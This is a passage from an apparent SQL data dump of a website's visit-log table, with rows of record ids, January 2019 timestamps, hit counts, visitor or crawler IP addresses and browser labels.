,'66.249.75.16','chrome'),(370124,1547397788,3,3,0,0,'66.249.75.22','chrome'),(370125,1547397791,1,1,0,0,'66.249.75.20','chrome'),(370126,1547397804,5,5,0,0,'216.244.66.241','other'),(370127,1547397934,1,1,0,0,'54.36.148.169','other'),(370128,1547398904,1,1,0,0,'54.36.148.192','other'),(370129,1547399041,1,1,0,0,'46.229.168.146','other'),(370130,1547399057,1,1,0,0,'66.249.75.22','chrome'),(370131,1547399070,1,1,0,0,'54.36.148.36','other'),(370132,1547399126,1,1,0,0,'207.46.13.197','other'),(370133,1547399214,1,1,0,0,'66.249.69.200','chrome'),(370134,1547399371,1,1,0,0,'66.249.75.20','chrome'),(370135,1547399447,4,4,0,0,'216.244.66.241','other'),(370136,1547399556,1,1,0,0,'54.36.149.14','other'),(370137,1547399575,1,1,0,0,'95.163.255.112','other'),(370138,1547399657,1,1,0,0,'95.163.255.102','other'),(370139,1547399819,1,1,0,0,'185.234.219.246','chrome'),(370140,1547400202,3,3,0,0,'178.154.244.11','other'),(370141,1547400207,1,1,0,0,'5.45.207.19','other'),(370142,1547400347,1,1,0,0,'54.36.148.172','other'),(370143,1547400607,7,7,0,0,'216.244.66.241','other'),(370144,1547400617,1,1,0,0,'54.36.148.207','other'),(370145,1547400629,1,1,0,0,'54.36.149.75','other'),(370146,1547400874,1,1,0,0,'37.9.113.148','other'),(370147,1547400978,1,1,0,0,'54.36.148.75','other'),(370148,1547401016,1,1,0,0,'5.45.207.79','other'),(370149,1547401232,3,3,0,0,'178.154.244.11','other'),(370150,1547401416,1,1,0,0,'141.8.142.103','other'),(370151,1547401419,1,1,0,0,'5.45.207.19','other'),(370152,1547401604,1,1,0,0,'54.36.148.153','other'),(370153,1547401698,2,2,0,0,'216.244.66.241','other'),(370154,1547401732,1,1,0,0,'54.36.148.255','other'),(370155,1547401800,1,1,0,0,'91.196.178.162','chrome'),(370156,1547402266,1,1,0,0,'66.249.69.204','chrome'),(370157,1547402319,3,3,0,0,'207.46.13.146','other'),(370158,1547402453,1,1,0,0,'66.249.75.20','chrome'),(370159,1547402504,1,1,0,0,'54.36.149.83','other'),(370160,1547402608,1,1,0,0,'54.36.148.246','other'),(370161,1547402927,1,1,0,0,'54.36.148.228','other'),(370162,1547402935,1,1,0,0,'54.36.148.100','other'),(370163,1547403035,1,1,0,0,'66.249.69.202','chrome'),(370164,1547403437,12,12,0,0,'216.244.66.241','other'),(370165,1547403475,1,1,0,0,'54.36.148.36','other'),(370166,1547403646,1,1,0,0,'46.229.168.149','other'),(370167,1547403682,1,1,0,0,'54.36.148.207','other'),(370168,1547404289,1,1,0,0,'54.36.148.52','other'),(370169,1547404342,6,6,0,0,'216.244.66.241','other'),(370170,1547404624,1,1,0,0,'54.36.148.13','other'),(370171,1547404632,1,1,0,0,'54.36.148.252','other'),(370172,1547404761,1,1,0,0,'66.249.75.15','chrome'),(370173,1547404762,1,1,0,0,'66.249.75.22','chrome'),(370174,1547405250,1,1,0,0,'46.229.168.132','other'),(370175,1547405305,1,1,0,0,'54.36.149.55','other'),(370176,1547405400,1,1,0,0,'54.36.148.150','other'),(370177,1547405697,1,1,0,0,'54.36.149.19','other'),(370178,1547406247,3,3,0,0,'216.244.66.241','other'),(370179,1547406463,1,1,0,0,'54.36.148.46','other'),(370180,1547406486,1,1,0,0,'8.29.198.26','other'),(370181,1547406502,1,1,0,0,'54.36.148.243','other'),(370182,1547406583,1,1,0,0,'54.36.148.240','other'),(370183,1547407149,1,1,0,0,'207.46.13.115','other'),(370184,1547407218,2,2,0,0,'54.165.59.7','other'),(370185,1547407349,1,1,0,0,'216.244.66.241','other'),(370186,1547407433,1,1,0,0,'54.36.148.245','other'),(370187,1547407434,1,1,0,0,'46.229.168.130','other'),(370188,1547407442,1,1,0,0,'54.36.148.76','other'),(370189,1547407553,1,1,0,0,'8.29.198.25','other'),(370190,1547407689,1,1,0,0,'207.46.13.146','other'),(370191,1547407810,1,1,0,0,'66.249.75.21','chrome'),(370192,1547407837,1,1,0,0,'92.112.159.229','chrome'),(370193,1547407989,1,1,0,0,'54.36.148.147','other'),(370194,1547408240,2,2,0,0,'54.165.59.7','other'),(370195,1547408305,1,1,0,0,'54.36.148.54','other'),(370196,1547408369,1,1,0,0,'46.229.168.152','other'),(370197,1547408683,1,1,0,0,'66.249.75.22','chrome'),(370198,1547409009,2,2,0,0,'66.249.75.21','chrome'),(370199,1547409047,8,8,0,0,'216.244.66.241','other'),(370200,1547409076,1,1,0,0,'54.36.149.87','other'),(370201,1547409317,1,1,0,0,'54.36.148.48','other'),(370202,1547409372,2,2,0,0,'5.35.37.50','chrome'),(370203,1547409707,1,1,0,0,'54.36.148.50','other'),(370204,1547409849,1,1,0,0,'66.249.69.200','chrome'),(370205,1547409965,1,1,0,0,'91.196.177.69','chrome'),(370206,1547410338,3,3,0,0,'216.244.66.241','other'),(370207,1547410759,1,1,0,0,'46.201.135.65','chrome'),(370208,1547411023,1,1,0,0,'66.249.75.15','chrome'),(370209,1547411024,1,1,0,0,'66.249.75.20','chrome'),(370210,1547411129,1,1,0,0,'66.249.75.21','chrome'),(370211,1547411171,1,1,0,0,'54.36.149.7','other'),(370212,1547411230,1,1,0,0,'54.36.148.79','other'),(370213,1547411326,1,1,0,0,'46.229.168.137','other'),(370214,1547411533,1,1,0,0,'54.36.148.11','other'),(370215,1547411835,1,1,0,0,'95.133.152.150','chrome'),(370216,1547411848,4,4,0,0,'216.244.66.241','other'),(370217,1547411927,2,2,0,0,'54.165.59.7','other'),(370218,1547412099,1,1,0,0,'66.249.75.21','chrome'),(370219,1547412263,1,1,0,0,'54.36.148.78','other'),(370220,1547412364,1,1,0,0,'54.36.149.41','other'),(370221,1547412400,1,1,0,0,'66.249.75.22','chrome'),(370222,1547412438,1,1,0,0,'176.36.21.189','chrome'),(370223,1547412576,1,1,0,0,'54.36.149.98','other'),(370224,1547412762,5,5,0,0,'216.244.66.241','other'),(370225,1547412839,2,2,0,0,'54.36.148.146','other'),(370226,1547413418,1,1,0,0,'66.249.69.221','chrome'),(370227,1547413419,1,1,0,0,'66.249.69.204','chrome'),(370228,1547413426,1,1,0,0,'54.36.148.58','other'),(370229,1547413569,1,1,0,0,'54.36.148.213','other'),(370230,1547414081,1,1,0,0,'54.36.148.138','other'),(370231,1547414222,1,1,0,0,'46.229.168.132','other'),(370232,1547414256,1,1,0,0,'66.249.75.21','chrome'),(370233,1547414360,2,2,0,0,'66.249.75.20','chrome'),(370234,1547414473,1,1,0,0,'54.36.149.50','other'),(370235,1547414541,2,2,0,0,'66.249.75.22','chrome'),(370236,1547414644,9,9,0,0,'216.244.66.241','other'),(370237,1547414696,1,1,0,0,'54.36.148.125','other'),(370238,1547414928,1,1,0,0,'54.36.148.196','other'),(370239,1547414963,1,1,0,0,'54.36.148.233','other'),(370240,1547415071,2,2,0,0,'54.165.59.7','other'),(370241,1547415077,1,1,0,0,'176.36.21.189','chrome'),(370242,1547415179,1,1,0,0,'66.249.69.221','chrome'),(370243,1547415180,1,1,0,0,'66.249.69.204','chrome'),(370244,1547415318,1,1,0,0,'95.163.255.108','other'),(370245,1547415324,1,1,0,0,'95.163.255.116','other'),(370246,1547415330,1,1,0,0,'95.163.255.107','other'),(370247,1547415336,1,1,0,0,'95.163.255.106','other'),(370248,1547415340,1,1,0,0,'95.163.255.102','other'),(370249,1547415353,2,2,0,0,'66.249.75.20','chrome'),(370250,1547415385,1,1,0,0,'95.163.255.112','other'),(370251,1547415435,1,1,0,0,'54.36.148.239','other'),(370252,1547415569,4,4,0,0,'216.244.66.241','other'),(370253,1547415761,1,1,0,0,'54.36.148.41','other'),(370254,1547415857,1,1,0,0,'54.36.148.50','other'),(370255,1547416042,2,2,0,0,'5.45.207.19','other'),(370256,1547416105,1,1,0,0,'54.36.148.200','other'),(370257,1547416174,1,1,0,0,'5.188.210.53','chrome'),(370258,1547416216,1,1,0,0,'5.45.207.79','other'),(370259,1547416276,1,1,0,0,'95.108.213.4','other'),(370260,1547416332,1,1,0,0,'54.36.149.14','other'),(370261,1547416384,1,1,0,0,'95.163.255.113','other'),(370262,1547416400,1,1,0,0,'95.163.255.116','other'),(370263,1547416564,1,1,0,0,'54.36.148.95','other'),(370264,1547416898,1,1,0,0,'46.229.168.148','other'),(370265,1547416986,1,1,0,0,'54.36.148.252','other'),(370266,1547417311,1,1,0,0,'8.29.198.27','other'),(370267,1547417344,1,1,0,0,'88.99.2.203','other'),(370268,1547417430,6,6,0,0,'216.244.66.241','other'),(370269,1547417653,1,1,0,0,'66.249.75.22','chrome'),(370270,1547417848,1,1,0,0,'157.55.39.69','other'),(370271,1547417904,1,1,0,0,'54.36.148.255','other'),(370272,1547418087,1,1,0,0,'54.36.148.175','other'),(370273,1547418186,1,1,0,0,'54.36.148.189','other'),(370274,1547418389,1,1,0,0,'8.29.198.26','other'),(370275,1547418492,6,6,0,0,'216.244.66.241','other'),(370277,1547418642,1,1,0,0,'54.36.149.24','other'),(370278,1547418849,1,1,0,0,'54.36.149.38','other'),(370279,1547418975,1,1,0,0,'54.36.148.113','other'),(370280,1547419195,1,1,0,0,'66.249.75.15','chrome'),(370281,1547419196,1,1,0,0,'66.249.75.20','chrome'),(370282,1547419208,1,1,0,0,'54.36.149.89','other'),(370283,1547419265,1,1,0,0,'54.36.148.136','other'),(370284,1547419299,1,1,0,0,'66.249.75.22','chrome'),(370285,1547419701,1,1,0,0,'54.36.148.219','other'),(370286,1547419853,1,1,0,0,'54.36.149.29','other'),(370287,1547419876,1,1,0,0,'54.36.148.95','other'),(370288,1547420423,4,4,0,0,'216.244.66.241','other'),(370289,1547420986,1,1,0,0,'66.249.69.204','chrome'),(370290,1547421276,1,1,0,0,'54.36.148.79','other'),(370291,1547421642,1,1,0,0,'216.244.66.241','other'),(370292,1547421775,1,1,0,0,'54.36.148.179','other'),(370293,1547421855,1,1,0,0,'54.36.149.53','other'),(370294,1547422425,1,1,0,0,'54.36.149.24','other'),(370295,1547422533,1,1,0,0,'54.36.148.80','other'),(370296,1547422550,1,1,0,0,'46.229.168.135','other'),(370297,1547422575,1,1,0,0,'46.229.168.146','other'),(370298,1547422576,1,1,0,0,'54.36.148.76','other'),(370299,1547422577,1,1,0,0,'46.229.168.130','other'),(370300,1547422600,2,2,0,0,'87.250.224.47','other'),(370301,1547422641,1,1,0,0,'66.249.75.22','chrome'),(370302,1547422710,1,1,0,0,'54.36.148.146','other'),(370303,1547422771,1,0,1,0,'66.249.75.16',''),(370305,1547422880,1,1,0,0,'54.36.148.196','other'),(370306,1547422988,1,1,0,0,'5.45.207.19','other'),(370307,1547423003,1,1,0,0,'54.36.148.111','other'),(370308,1547423080,3,3,0,0,'216.244.66.241','other'),(370309,1547423139,1,1,0,0,'5.45.207.79','other'),(370310,1547423212,1,1,0,0,'54.36.149.79','other'),(370311,1547424121,1,1,0,0,'46.229.168.137','other'),(370312,1547424278,1,1,0,0,'54.36.149.40','other'),(370313,1547424428,1,1,0,0,'54.36.148.222','other'),(370314,1547424435,1,1,0,0,'54.36.148.58','other'),(370315,1547424500,1,1,0,0,'46.229.168.153','other'),(370316,1547424544,1,1,0,0,'88.99.2.203','other'),(370317,1547424786,1,1,0,0,'54.36.148.75','other'),(370318,1547424826,1,1,0,0,'54.36.149.45','other'),(370319,1547424842,1,1,0,0,'54.36.149.49','other'),(370320,1547424951,1,1,0,0,'54.36.148.87','other'),(370321,1547425237,1,1,0,0,'54.36.148.81','other'),(370322,1547425621,1,1,0,0,'54.36.148.203','other'),(370323,1547425858,1,1,0,0,'54.36.148.34','other'),(370324,1547425877,10,10,0,0,'216.244.66.241','other'),(370325,1547426140,1,1,0,0,'54.36.149.77','other'),(370326,1547426509,1,1,0,0,'46.229.168.149','other'),(370327,1547426577,1,1,0,0,'54.36.149.76','other'),(370328,1547426846,8,8,0,0,'216.244.66.241','other'),(370329,1547427314,1,1,0,0,'37.233.102.65','other'),(370330,1547428087,1,1,0,0,'66.249.75.20','chrome'),(370331,1547428139,1,1,0,0,'8.29.198.25','other'),(370332,1547428621,1,1,0,0,'54.36.148.33','other'),(370333,1547428722,1,1,0,0,'66.249.75.15','chrome'),(370335,1547428724,8,8,0,0,'216.244.66.241','other'),(370336,1547428756,2,2,0,0,'37.9.113.148','other'),(370337,1547428804,1,1,0,0,'54.36.149.78','other'),(370338,1547428908,1,1,0,0,'37.9.113.20','other'),(370339,1547428988,1,1,0,0,'66.249.69.217','chrome'),(370340,1547428989,1,1,0,0,'66.249.69.204','chrome'),(370341,1547429043,1,1,0,0,'95.108.213.4','other'),(370342,1547429099,1,1,0,0,'66.249.75.22','chrome'),(370343,1547429208,1,1,0,0,'37.9.113.103','other'),(370344,1547429213,1,1,0,0,'8.29.198.26','other'),(370345,1547429495,1,1,0,0,'54.36.148.74','other'),(370346,1547429635,1,1,0,0,'54.36.148.77','other'),(370347,1547429651,3,3,0,0,'216.244.66.241','other'),(370348,1547429693,1,1,0,0,'54.36.148.226','other'),(370349,1547430110,1,1,0,0,'54.36.149.104','other'),(370350,1547430360,1,1,0,0,'54.36.148.42','other'),(370351,1547431328,1,1,0,0,'46.229.168.145','other'),(370352,1547431533,1,1,0,0,'5.45.207.79','other'),(370353,1547431823,4,4,0,0,'216.244.66.241','other'),(370354,1547432277,1,1,0,0,'46.229.168.135','other'),(370355,1547432882,1,1,0,0,'54.36.149.12','other'),(370356,1547432919,1,1,0,0,'54.36.149.29','other'),(370357,1547432947,1,1,0,0,'54.36.149.17','other'),(370358,1547433053,1,1,0,0,'54.36.148.225','other'),(370359,1547433302,1,1,0,0,'46.229.168.135','other'),(370360,1547433304,1,1,0,0,'46.229.168.153','other'),(370361,1547433331,1,1,0,0,'54.36.149.66','other'),(370362,1547433352,1,1,0,0,'54.36.149.72','other'),(370363,1547433573,1,1,0,0,'54.36.148.108','other'),(370364,1547433740,1,1,0,0,'54.36.148.186','other'),(370365,1547433809,2,2,0,0,'34.221.0.62','chrome'),(370366,1547433826,1,1,0,0,'54.36.148.222','other'),(370367,1547433877,1,1,0,0,'54.36.148.254','other'),(370368,1547433947,1,1,0,0,'66.249.69.217','chrome'),(370370,1547434218,1,1,0,0,'54.36.148.15','other'),(370371,1547434424,10,10,0,0,'216.244.66.241','other'),(370372,1547434545,1,1,0,0,'31.184.238.115','chrome'),(370373,1547435216,1,1,0,0,'79.7.218.134','other'),(370374,1547435362,1,1,0,0,'66.249.75.16','chrome'),(370375,1547435363,1,1,0,0,'66.249.75.21','chrome'),(370376,1547435385,1,1,0,0,'54.36.149.58','other'),(370377,1547435587,1,1,0,0,'213.180.203.40','other'),(370378,1547435641,4,4,0,0,'216.244.66.241','other'),(370379,1547435690,1,1,0,0,'95.108.181.54','other'),(370380,1547435693,1,1,0,0,'141.8.132.16','other'),(370381,1547435758,1,1,0,0,'66.249.69.219','chrome'),(370383,1547435764,1,1,0,0,'54.36.148.49','other'),(370384,1547436275,1,1,0,0,'54.36.148.120','other'),(370385,1547436313,1,1,0,0,'141.8.142.38','other'),(370386,1547436358,1,1,0,0,'54.36.148.225','other'),(370387,1547436668,1,1,0,0,'213.180.203.40','other'),(370388,1547437101,1,1,0,0,'54.36.148.91','other'),(370389,1547437261,4,4,0,0,'216.244.66.241','other'),(370390,1547437300,1,1,0,0,'46.229.168.151','other'),(370391,1547438201,4,4,0,0,'216.244.66.241','other'),(370392,1547438874,1,1,0,0,'54.36.149.75','other'),(370393,1547438970,1,1,0,0,'8.29.198.25','other'),(370394,1547439046,1,1,0,0,'46.229.168.148','other'),(370395,1547439063,1,1,0,0,'54.36.149.28','other'),(370396,1547439165,1,1,0,0,'54.36.148.46','other'),(370397,1547439236,1,1,0,0,'54.36.148.29','other'),(370398,1547439305,5,5,0,0,'216.244.66.241','other'),(370399,1547439392,1,1,0,0,'66.249.75.20','chrome'),(370400,1547439441,1,1,0,0,'46.229.168.153','other'),(370401,1547439502,1,1,0,0,'46.229.168.134','other'),(370402,1547439620,1,1,0,0,'54.36.148.143','other'),(370403,1547439692,1,1,0,0,'54.36.149.10','other'),(370404,1547439869,1,1,0,0,'54.36.148.252','other'),(370405,1547439943,1,1,0,0,'13.66.139.0','other'),(370406,1547440003,1,1,0,0,'54.36.148.18','other'),(370407,1547440046,1,1,0,0,'8.29.198.26','other'),(370408,1547440496,1,1,0,0,'66.249.75.22','chrome'),(370409,1547440563,6,6,0,0,'216.244.66.241','other'),(370410,1547441000,14,14,0,0,'178.151.245.174','other'),(370411,1547441261,1,1,0,0,'46.229.168.146','other'),(370412,1547441352,1,1,0,0,'54.36.149.82','other'),(370413,1547441512,3,3,0,0,'216.244.66.241','other'),(370414,1547441751,1,1,0,0,'54.36.148.65','other'),(370415,1547442308,1,1,0,0,'54.36.148.23','other'),(370416,1547442591,1,1,0,0,'54.36.148.122','other'),(370417,1547442594,1,1,0,0,'46.229.168.134','other'),(370418,1547442712,1,1,0,0,'66.249.69.200','chrome'),(370419,1547442865,7,7,0,0,'216.244.66.241','other'),(370420,1547442938,2,2,0,0,'141.8.142.103','other'),(370421,1547442945,1,1,0,0,'95.108.213.4','other'),(370422,1547443091,1,1,0,0,'66.249.75.15','chrome'),(370423,1547443092,1,1,0,0,'66.249.75.21','chrome'),(370424,1547443240,1,1,0,0,'54.36.148.236','other'),(370425,1547443369,1,1,0,0,'178.154.244.11','other'),(370426,1547443418,1,1,0,0,'54.36.149.70','other'),(370427,1547443613,1,1,0,0,'66.249.69.217','chrome'),(370428,1547443614,1,1,0,0,'66.249.69.202','chrome'),(370429,1547443775,1,1,0,0,'54.36.149.68','other'),(370430,1547443786,2,2,0,0,'66.249.75.22','chrome'),(370431,1547443915,7,7,0,0,'216.244.66.241','other'),(370432,1547443931,1,1,0,0,'54.36.148.221','other'),(370433,1547443933,1,1,0,0,'54.36.148.211','other'),(370434,1547443944,1,1,0,0,'54.36.149.18','other'),(370435,1547444066,1,1,0,0,'54.36.148.33','other'),(370436,1547444137,1,1,0,0,'5.45.207.79','other'),(370437,1547444180,1,1,0,0,'54.36.148.179','other'),(370438,1547445024,1,1,0,0,'54.36.149.64','other'),(370439,1547445053,1,1,0,0,'54.36.149.17','other'),(370440,1547445094,1,1,0,0,'54.36.148.107','other'),(370441,1547445387,1,1,0,0,'54.36.148.18','other'),(370442,1547445533,1,1,0,0,'54.36.148.218','other'),(370443,1547445667,1,1,0,0,'128.199.38.115','other'),(370444,1547445669,1,1,0,0,'212.32.255.198','other'),(370445,1547445698,1,1,0,0,'216.244.66.241','other'),(370446,1547445741,1,1,0,0,'54.36.149.42','other'),(370447,1547446369,1,1,0,0,'178.154.244.11','other'),(370448,1547446469,1,1,0,0,'54.36.148.19','other'),(370449,1547446529,1,1,0,0,'54.36.148.146','other'),(370450,1547447026,3,3,0,0,'216.244.66.241','other'),(370451,1547447132,2,2,0,0,'162.210.196.130','other'),(370452,1547447176,1,1,0,0,'37.9.113.20','other'),(370453,1547447426,1,1,0,0,'46.229.168.135','other'),(370454,1547447427,1,1,0,0,'46.229.168.154','other'),(370455,1547447505,1,1,0,0,'110.22.129.94','firefox'),(370456,1547447608,1,1,0,0,'54.36.149.107','other'),(370457,1547447831,1,1,0,0,'54.36.149.24','other'),(370458,1547448073,1,1,0,0,'54.36.148.131','other'),(370459,1547448169,1,1,0,0,'54.36.148.166','other'),(370460,1547448241,1,1,0,0,'54.36.149.48','other'),(370461,1547448316,1,1,0,0,'66.249.69.143','chrome'),(370462,1547448317,1,1,0,0,'66.249.69.149','chrome'),(370463,1547448505,6,6,0,0,'216.244.66.241','other'),(370464,1547448696,1,1,0,0,'54.36.148.25','other'),(370465,1547448859,1,1,0,0,'46.229.168.136','other'),(370466,1547448862,1,1,0,0,'66.102.9.60','chrome'),(370467,1547448969,1,1,0,0,'54.36.148.204','other'),(370468,1547449027,1,1,0,0,'13.66.139.0','other'),(370469,1547449343,1,1,0,0,'54.36.148.67','other'),(370470,1547449357,1,1,0,0,'54.36.148.174','other'),(370471,1547449418,4,4,0,0,'216.244.66.241','other'),(370472,1547449576,1,1,0,0,'54.36.148.216','other'),(370473,1547449794,1,1,0,0,'8.29.198.27','other'),(370474,1547450025,1,1,0,0,'46.229.168.138','other'),(370475,1547450092,1,1,0,0,'54.36.148.135','other'),(370476,1547450153,1,1,0,0,'54.36.149.25','other'),(370477,1547450539,1,1,0,0,'54.36.148.224','other'),(370478,1547450547,1,1,0,0,'54.36.148.192','other'),(370479,1547450561,2,2,0,0,'91.196.178.79','firefox'),(370480,1547450601,1,1,0,0,'66.249.69.202','chrome'),(370481,1547450706,1,1,0,0,'46.229.168.141','other'),(370482,1547450881,1,1,0,0,'8.29.198.27','other'),(370483,1547451185,1,1,0,0,'54.36.148.32','other'),(370484,1547451278,1,1,0,0,'54.36.148.115','other'),(370485,1547451362,8,8,0,0,'216.244.66.241','other'),(370486,1547451413,1,1,0,0,'66.249.69.200','chrome'),(370487,1547451445,1,1,0,0,'66.249.69.204','chrome'),(370488,1547451492,2,2,0,0,'91.196.178.79','firefox'),(370489,1547451513,2,2,0,0,'91.196.178.85','chrome'),(370490,1547451678,1,1,0,0,'66.249.69.148','chrome'),(370491,1547451758,1,1,0,0,'54.36.148.206','other'),(370492,1547451815,1,1,0,0,'95.132.42.62','chrome'),(370493,1547452279,4,4,0,0,'216.244.66.241','other'),(370494,1547452283,1,1,0,0,'95.163.255.68','other'),(370495,1547452285,1,1,0,0,'95.163.255.69','other'),(370496,1547452315,1,1,0,0,'194.50.51.253','chrome'),(370497,1547452351,1,1,0,0,'54.36.149.10','other'),(370498,1547452464,1,1,0,0,'54.36.148.11','other'),(370499,1547453032,1,1,0,0,'66.249.69.204','chrome'),(370500,1547453064,1,1,0,0,'54.36.148.244','other'),(370501,1547453191,1,1,0,0,'54.36.149.66','other'),(370502,1547453392,1,1,0,0,'54.36.149.87','other'),(370503,1547453564,1,1,0,0,'180.76.15.159','other'),(370504,1547453671,1,1,0,0,'66.249.69.221','chrome'),(370506,1547453834,1,1,0,0,'54.36.148.37','other'),(370507,1547453884,1,1,0,0,'54.36.148.68','other'),(370508,1547453889,1,1,0,0,'54.36.148.19','other'),(370509,1547454041,1,1,0,0,'54.36.149.32','other'),(370510,1547454219,4,4,0,0,'216.244.66.241','other'),(370511,1547454448,1,1,0,0,'54.36.148.180','other'),(370512,1547454994,1,1,0,0,'54.36.148.125','other'),(370513,1547455233,1,1,0,0,'54.36.149.41','other'),(370514,1547455270,9,9,0,0,'216.244.66.241','other'),(370515,1547455326,1,1,0,0,'54.36.148.74','other'),(370516,1547455419,1,1,0,0,'37.53.123.48','chrome'),(370517,1547455443,1,1,0,0,'66.249.69.219','chrome'),(370519,1547455452,3,3,0,0,'46.219.57.138','chrome'),(370520,1547455522,1,1,0,0,'54.36.148.81','other'),(370521,1547455559,1,1,0,0,'54.36.148.66','other'),(370522,1547455702,1,1,0,0,'66.249.69.144','chrome'),(370523,1547455703,2,2,0,0,'66.249.69.149','chrome'),(370524,1547455786,1,1,0,0,'54.36.149.87','other'),(370525,1547455828,1,1,0,0,'54.36.149.79','other'),(370526,1547455952,1,1,0,0,'54.36.149.54','other'),(370527,1547455975,1,1,0,0,'54.36.148.72','other'),(370528,1547456074,1,1,0,0,'54.36.148.101','other'),(370529,1547456417,1,1,0,0,'54.36.149.23','other'),(370530,1547456503,1,1,0,0,'54.36.148.39','other'),(370531,1547457054,8,8,0,0,'216.244.66.241','other'),(370532,1547457201,2,2,0,0,'91.196.178.65','chrome'),(370533,1547457371,2,2,0,0,'66.249.69.148','chrome'),(370534,1547457547,1,1,0,0,'91.196.177.46','firefox'),(370535,1547457795,3,3,0,0,'66.249.69.149','chrome'),(370536,1547458036,2,2,0,0,'37.55.190.25','firefox'),(370537,1547458132,1,1,0,0,'128.69.160.92','msie'),(370538,1547458250,10,10,0,0,'216.244.66.241','other'),(370539,1547458406,1,1,0,0,'54.36.148.114','other'),(370540,1547458543,1,1,0,0,'54.36.149.25','other'),(370541,1547458746,2,2,0,0,'66.249.69.144','chrome'),(370542,1547458747,1,1,0,0,'66.249.69.149','chrome'),(370543,1547458855,1,1,0,0,'94.181.136.12','chrome'),(370544,1547459327,1,1,0,0,'91.196.178.65','chrome'),(370545,1547459333,4,4,0,0,'66.249.69.148','chrome'),(370546,1547459466,1,1,0,0,'66.249.69.221','chrome'),(370547,1547459467,1,1,0,0,'66.249.69.202','chrome'),(370548,1547459517,1,1,0,0,'54.36.149.11','other'),(370549,1547459649,1,1,0,0,'46.229.168.151','other'),(370550,1547459668,1,1,0,0,'66.249.69.144','chrome'),(370551,1547459761,1,1,0,0,'46.229.168.133','other'),(370552,1547459893,7,7,0,0,'216.244.66.241','other'),(370553,1547459962,1,1,0,0,'95.28.225.171','chrome'),(370554,1547460054,1,1,0,0,'54.36.149.32','other'),(370555,1547460132,1,1,0,0,'54.36.149.10','other'),(370556,1547460135,1,1,0,0,'54.36.148.157','other'),(370557,1547460305,1,1,0,0,'54.36.148.150','other'),(370558,1547460327,1,1,0,0,'54.36.148.223','other'),(370559,1547460482,1,1,0,0,'46.229.168.152','other'),(370560,1547460610,1,1,0,0,'54.36.148.217','other'),(370561,1547460625,1,1,0,0,'8.29.198.25','other'),(370562,1547460947,3,3,0,0,'91.196.178.177','chrome'),(370563,1547461198,1,1,0,0,'54.36.149.88','other'),(370564,1547461202,4,4,0,0,'216.244.66.241','other'),(370565,1547461239,1,1,0,0,'46.188.33.126','msie'),(370566,1547461345,1,1,0,0,'54.36.148.243','other'),(370567,1547461452,1,1,0,0,'123.126.113.165','other'),(370568,1547461630,1,1,0,0,'54.36.149.33','other'),(370569,1547461650,1,1,0,0,'46.229.168.149','other'),(370570,1547461719,1,1,0,0,'8.29.198.26','other'),(370571,1547461818,1,1,0,0,'54.36.148.39','other'),(370572,1547461945,2,2,0,0,'141.8.142.103','other'),(370573,1547461951,1,1,0,0,'54.36.148.137','other'),(370574,1547462049,2,2,0,0,'178.154.244.11','other'),(370575,1547462084,2,2,0,0,'213.180.203.9','other'),(370576,1547462101,3,3,0,0,'5.45.207.79','other'),(370577,1547462173,1,1,0,0,'95.108.181.75','other'),(370578,1547462310,5,5,0,0,'5.45.207.19','other'),(370579,1547462452,1,1,0,0,'95.108.181.54','other'),(370580,1547462455,1,1,0,0,'178.154.171.27','other'),(370581,1547462488,1,1,0,0,'37.9.113.103','other'),(370582,1547462507,1,1,0,0,'37.9.113.20','other'),(370583,1547462521,1,1,0,0,'66.249.69.217','chrome'),(370585,1547462529,1,1,0,0,'87.250.224.47','other'),(370586,1547462556,1,1,0,0,'66.249.69.143','chrome'),(370588,1547462580,1,1,0,0,'54.36.148.80','other'),(370589,1547462649,1,1,0,0,'46.229.168.134','other'),(370590,1547462729,5,5,0,0,'216.244.66.241','other'),(370591,1547462753,1,1,0,0,'37.143.101.10','chrome'),(370592,1547462872,1,1,0,0,'66.249.69.145','chrome'),(370593,1547462909,1,1,0,0,'37.9.113.148','other'),(370594,1547462910,1,1,0,0,'54.36.148.176','other'),(370595,1547463279,1,1,0,0,'54.36.148.70','other'),(370596,1547463383,1,1,0,0,'54.36.149.53','other'),(370597,1547463395,1,1,0,0,'54.36.148.49','other'),(370598,1547463396,1,1,0,0,'5.255.253.16','other'),(370599,1547463689,2,2,0,0,'5.45.207.19','other'),(370600,1547463869,5,5,0,0,'216.244.66.241','other'),(370601,1547463903,1,1,0,0,'54.36.148.53','other'),(370602,1547463953,1,1,0,0,'95.108.213.4','other'),(370603,1547463995,1,1,0,0,'54.36.148.118','other'),(370604,1547464023,2,2,0,0,'66.249.69.204','chrome'),(370605,1547464093,1,1,0,0,'141.8.142.103','other'),(370606,1547464199,1,1,0,0,'66.249.69.148','chrome'),(370607,1547464208,2,2,0,0,'130.180.210.94','chrome'),(370608,1547464723,1,1,0,0,'54.36.148.218','other'),(370609,1547464801,1,1,0,0,'5.45.207.19','other'),(370610,1547464906,1,1,0,0,'144.76.81.72','other'),(370611,1547464952,1,1,0,0,'46.229.168.129','other'),(370612,1547464977,1,1,0,0,'66.249.75.16','chrome'),(370614,1547464999,1,1,0,0,'141.8.142.103','other'),(370615,1547465470,1,1,0,0,'46.229.168.146','other'),(370616,1547465497,1,1,0,0,'54.36.148.50','other'),(370617,1547465515,1,1,0,0,'54.36.148.190','other'),(370618,1547465560,1,1,0,0,'54.36.148.93','other'),(370619,1547465612,4,4,0,0,'216.244.66.241','other'),(370620,1547465673,1,1,0,0,'54.36.148.47','other'),(370621,1547466072,1,1,0,0,'54.36.148.55','other'),(370622,1547466422,1,1,0,0,'95.163.255.93','other'),(370623,1547466426,1,1,0,0,'95.163.255.92','other'),(370624,1547466532,1,1,0,0,'66.249.69.219','chrome'),(370626,1547466690,3,3,0,0,'66.249.75.21','chrome'),(370627,1547466774,4,4,0,0,'216.244.66.241','other'),(370628,1547466978,1,1,0,0,'40.77.167.116','other'),(370629,1547467060,1,1,0,0,'54.36.148.62','other'),(370630,1547467092,1,1,0,0,'95.163.255.94','other'),(370631,1547467095,1,1,0,0,'95.163.255.98','other'),(370632,1547467140,2,2,0,0,'40.77.167.174','other'),(370633,1547467499,1,1,0,0,'54.36.149.91','other'),(370634,1547467566,1,1,0,0,'66.249.75.20','chrome'),(370635,1547467606,1,1,0,0,'46.229.168.151','other'),(370636,1547467735,1,1,0,0,'207.46.13.171','other'),(370637,1547467846,1,1,0,0,'54.36.148.57','other'),(370638,1547467904,1,1,0,0,'54.36.148.210','other'),(370639,1547468099,3,3,0,0,'66.249.69.200','chrome'),(370640,1547468124,1,1,0,0,'66.249.69.219','chrome'),(370641,1547468132,1,1,0,0,'54.36.149.47','other'),(370642,1547468140,1,1,0,0,'54.36.148.171','other'),(370643,1547468358,1,1,0,0,'91.196.177.46','firefox'),(